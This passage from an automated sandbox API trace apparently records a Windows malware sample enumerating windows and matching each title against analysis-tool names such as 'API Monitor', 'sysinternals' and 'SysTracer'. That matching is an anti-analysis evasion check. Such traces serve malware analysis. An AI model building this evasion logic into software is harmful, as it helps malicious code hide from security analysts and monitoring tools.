lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.768] strstr (_Str="Objectives Bailey Audit", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.768] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.768] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.768] strstr (_Str="Objectives Bailey Audit", _SubStr="sysinternals") returned 0x0 [0158.768] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.768] lstrcpyA (in: lpString1=0x430400, lpString2="65928" | out: lpString1="65928") returned="65928" [0158.768] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.769] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.769] GetWindowTextA (in: hWnd=0x10188, lpString=0x340df8, nMaxCount=1024 | out: lpString="Rich Zealand") returned 12 [0158.769] lstrcpyA (in: lpString1=0x430800, lpString2="Rich Zealand" | out: lpString1="Rich Zealand") returned="Rich Zealand" [0158.769] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327a20, 
lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.769] GetClassNameA (in: hWnd=0x10188, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="rich_zealand_wnd") returned 16 [0158.769] lstrcpyA (in: lpString1=0x430c00, lpString2="rich_zealand_wnd" | out: lpString1="rich_zealand_wnd") returned="rich_zealand_wnd" [0158.769] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.769] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.769] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.770] strstr (_Str="Rich Zealand", _SubStr="- main thread") returned 0x0 [0158.770] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.770] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.770] strstr (_Str="Rich Zealand", _SubStr="API Monitor") returned 0x0 [0158.770] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.770] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.770] strstr (_Str="Rich Zealand", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.770] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.771] lstrcpyA (in: 
lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.771] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.771] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.771] strstr (_Str="Rich Zealand", _SubStr="sysinternals") returned 0x0 [0158.771] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.771] lstrcpyA (in: lpString1=0x430400, lpString2="65924" | out: lpString1="65924") returned="65924" [0158.771] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.771] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.771] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.771] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.771] GetWindowTextA (in: hWnd=0x10184, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Volume") returned 6 [0158.771] lstrcpyA (in: lpString1=0x430800, lpString2="Volume" | out: lpString1="Volume") returned="Volume" [0158.771] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.772] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.772] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.772] GetClassNameA (in: hWnd=0x10184, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Volumewnd") returned 9 [0158.772] lstrcpyA (in: lpString1=0x430c00, lpString2="Volumewnd" | out: lpString1="Volumewnd") returned="Volumewnd" [0158.772] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.772] lstrcpyA (in: 
lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.772] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.772] strstr (_Str="Volume", _SubStr="- main thread") returned 0x0 [0158.772] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.772] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.772] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.773] strstr (_Str="Volume", _SubStr="API Monitor") returned 0x0 [0158.773] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.773] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.773] strstr (_Str="Volume", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.773] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.773] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.773] strstr (_Str="Volume", _SubStr="sysinternals") returned 0x0 [0158.773] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.774] lstrcpyA (in: lpString1=0x430400, lpString2="65920" | out: lpString1="65920") returned="65920" [0158.774] lstrcpynA (in: lpString1=0x340df8, 
lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.774] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.774] GetWindowTextA (in: hWnd=0x10180, lpString=0x340df8, nMaxCount=1024 | out: lpString="C Weird Baskets") returned 15 [0158.774] lstrcpyA (in: lpString1=0x430800, lpString2="C Weird Baskets" | out: lpString1="C Weird Baskets") returned="C Weird Baskets" [0158.774] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.774] GetClassNameA (in: hWnd=0x10180, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="CweirdBaskets") returned 13 [0158.774] lstrcpyA (in: lpString1=0x430c00, lpString2="CweirdBaskets" | out: lpString1="CweirdBaskets") returned="CweirdBaskets" [0158.775] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.775] strstr (_Str="C Weird Baskets", _SubStr="- main thread") returned 0x0 [0158.775] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.775] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") 
returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.775] strstr (_Str="C Weird Baskets", _SubStr="API Monitor") returned 0x0 [0158.775] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.775] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.775] strstr (_Str="C Weird Baskets", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.775] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.776] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.776] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.776] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.776] strstr (_Str="C Weird Baskets", _SubStr="sysinternals") returned 0x0 [0158.776] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.776] lstrcpyA (in: lpString1=0x430400, lpString2="65916" | out: lpString1="65916") returned="65916" [0158.776] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.776] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.776] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.776] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.776] GetWindowTextA (in: hWnd=0x1017c, lpString=0x3401e0, nMaxCount=1024 | out: 
lpString="Laptop Tattoo") returned 13 [0158.776] lstrcpyA (in: lpString1=0x430800, lpString2="Laptop Tattoo" | out: lpString1="Laptop Tattoo") returned="Laptop Tattoo" [0158.777] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.777] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.777] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.777] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="laptopTattooapp") returned 15 [0158.777] lstrcpyA (in: lpString1=0x430c00, lpString2="laptopTattooapp" | out: lpString1="laptopTattooapp") returned="laptopTattooapp" [0158.777] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.777] strstr (_Str="Laptop Tattoo", _SubStr="- main thread") returned 0x0 [0158.777] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.777] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.777] strstr (_Str="Laptop Tattoo", _SubStr="API Monitor") returned 0x0 [0158.777] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.778] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.778] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.781] lstrcpyA 
(in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.782] strstr (_Str="Laptop Tattoo", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.783] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.792] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.792] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.792] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.792] strstr (_Str="Laptop Tattoo", _SubStr="sysinternals") returned 0x0 [0158.792] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.792] lstrcpyA (in: lpString1=0x430400, lpString2="65912" | out: lpString1="65912") returned="65912" [0158.792] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.792] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.793] GetWindowTextA (in: hWnd=0x10178, lpString=0x340df8, nMaxCount=1024 | out: lpString="English Performing") returned 18 [0158.793] lstrcpyA (in: lpString1=0x430800, lpString2="English Performing" | out: lpString1="English Performing") returned="English Performing" [0158.793] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.793] 
GetClassNameA (in: hWnd=0x10178, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="englishperformingapp") returned 20 [0158.793] lstrcpyA (in: lpString1=0x430c00, lpString2="englishperformingapp" | out: lpString1="englishperformingapp") returned="englishperformingapp" [0158.793] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.793] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.793] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.793] strstr (_Str="English Performing", _SubStr="- main thread") returned 0x0 [0158.793] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.794] strstr (_Str="English Performing", _SubStr="API Monitor") returned 0x0 [0158.794] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.794] strstr (_Str="English Performing", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.794] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") 
returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.794] strstr (_Str="English Performing", _SubStr="sysinternals") returned 0x0 [0158.794] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x430400, lpString2="65908" | out: lpString1="65908") returned="65908" [0158.794] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.795] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.795] GetWindowTextA (in: hWnd=0x10174, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Previous Automation Previously") returned 30 [0158.795] lstrcpyA (in: lpString1=0x430800, lpString2="Previous Automation Previously" | out: lpString1="Previous Automation Previously") returned="Previous Automation Previously" [0158.795] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.795] GetClassNameA (in: hWnd=0x10174, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="PreviousAutomationPreviouslyapp") returned 31 [0158.795] lstrcpyA (in: lpString1=0x430c00, lpString2="PreviousAutomationPreviouslyapp" | out: lpString1="PreviousAutomationPreviouslyapp") returned="PreviousAutomationPreviouslyapp" [0158.795] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" 
[0158.795] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.795] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.795] strstr (_Str="Previous Automation Previously", _SubStr="- main thread") returned 0x0 [0158.795] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.796] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.796] strstr (_Str="Previous Automation Previously", _SubStr="API Monitor") returned 0x0 [0158.796] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.796] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.796] strstr (_Str="Previous Automation Previously", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.796] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.796] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.796] strstr (_Str="Previous Automation Previously", _SubStr="sysinternals") returned 0x0 [0158.796] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.797] lstrcpyA (in: lpString1=0x430400, 
lpString2="65904" | out: lpString1="65904") returned="65904" [0158.797] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.797] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.797] GetWindowTextA (in: hWnd=0x10170, lpString=0x340df8, nMaxCount=1024 | out: lpString="Abc") returned 3 [0158.797] lstrcpyA (in: lpString1=0x430800, lpString2="Abc" | out: lpString1="Abc") returned="Abc" [0158.797] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.797] GetClassNameA (in: hWnd=0x10170, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Abccls") returned 6 [0158.797] lstrcpyA (in: lpString1=0x430c00, lpString2="Abccls" | out: lpString1="Abccls") returned="Abccls" [0158.797] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.797] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.797] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="- main thread") returned 0x0 [0158.798] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.798] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: 
lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="API Monitor") returned 0x0 [0158.798] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.798] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.798] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.798] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="sysinternals") returned 0x0 [0158.799] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.799] lstrcpyA (in: lpString1=0x430400, lpString2="65900" | out: lpString1="65900") returned="65900" [0158.799] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.799] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.799] GetWindowTextA (in: hWnd=0x1016c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Isolation") returned 9 
[0158.799] lstrcpyA (in: lpString1=0x430800, lpString2="Isolation" | out: lpString1="Isolation") returned="Isolation" [0158.799] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.799] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Isolationclass") returned 14 [0158.799] lstrcpyA (in: lpString1=0x430c00, lpString2="Isolationclass" | out: lpString1="Isolationclass") returned="Isolationclass" [0158.799] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.800] strstr (_Str="Isolation", _SubStr="- main thread") returned 0x0 [0158.800] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.800] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.800] strstr (_Str="Isolation", _SubStr="API Monitor") returned 0x0 [0158.800] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.800] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: 
lpString1="strstr") returned="strstr" [0158.800] strstr (_Str="Isolation", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.800] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.800] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.801] strstr (_Str="Isolation", _SubStr="sysinternals") returned 0x0 [0158.801] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.801] lstrcpyA (in: lpString1=0x430400, lpString2="65896" | out: lpString1="65896") returned="65896" [0158.801] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.801] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.801] GetWindowTextA (in: hWnd=0x10168, lpString=0x340df8, nMaxCount=1024 | out: lpString="Ship Loans") returned 10 [0158.801] lstrcpyA (in: 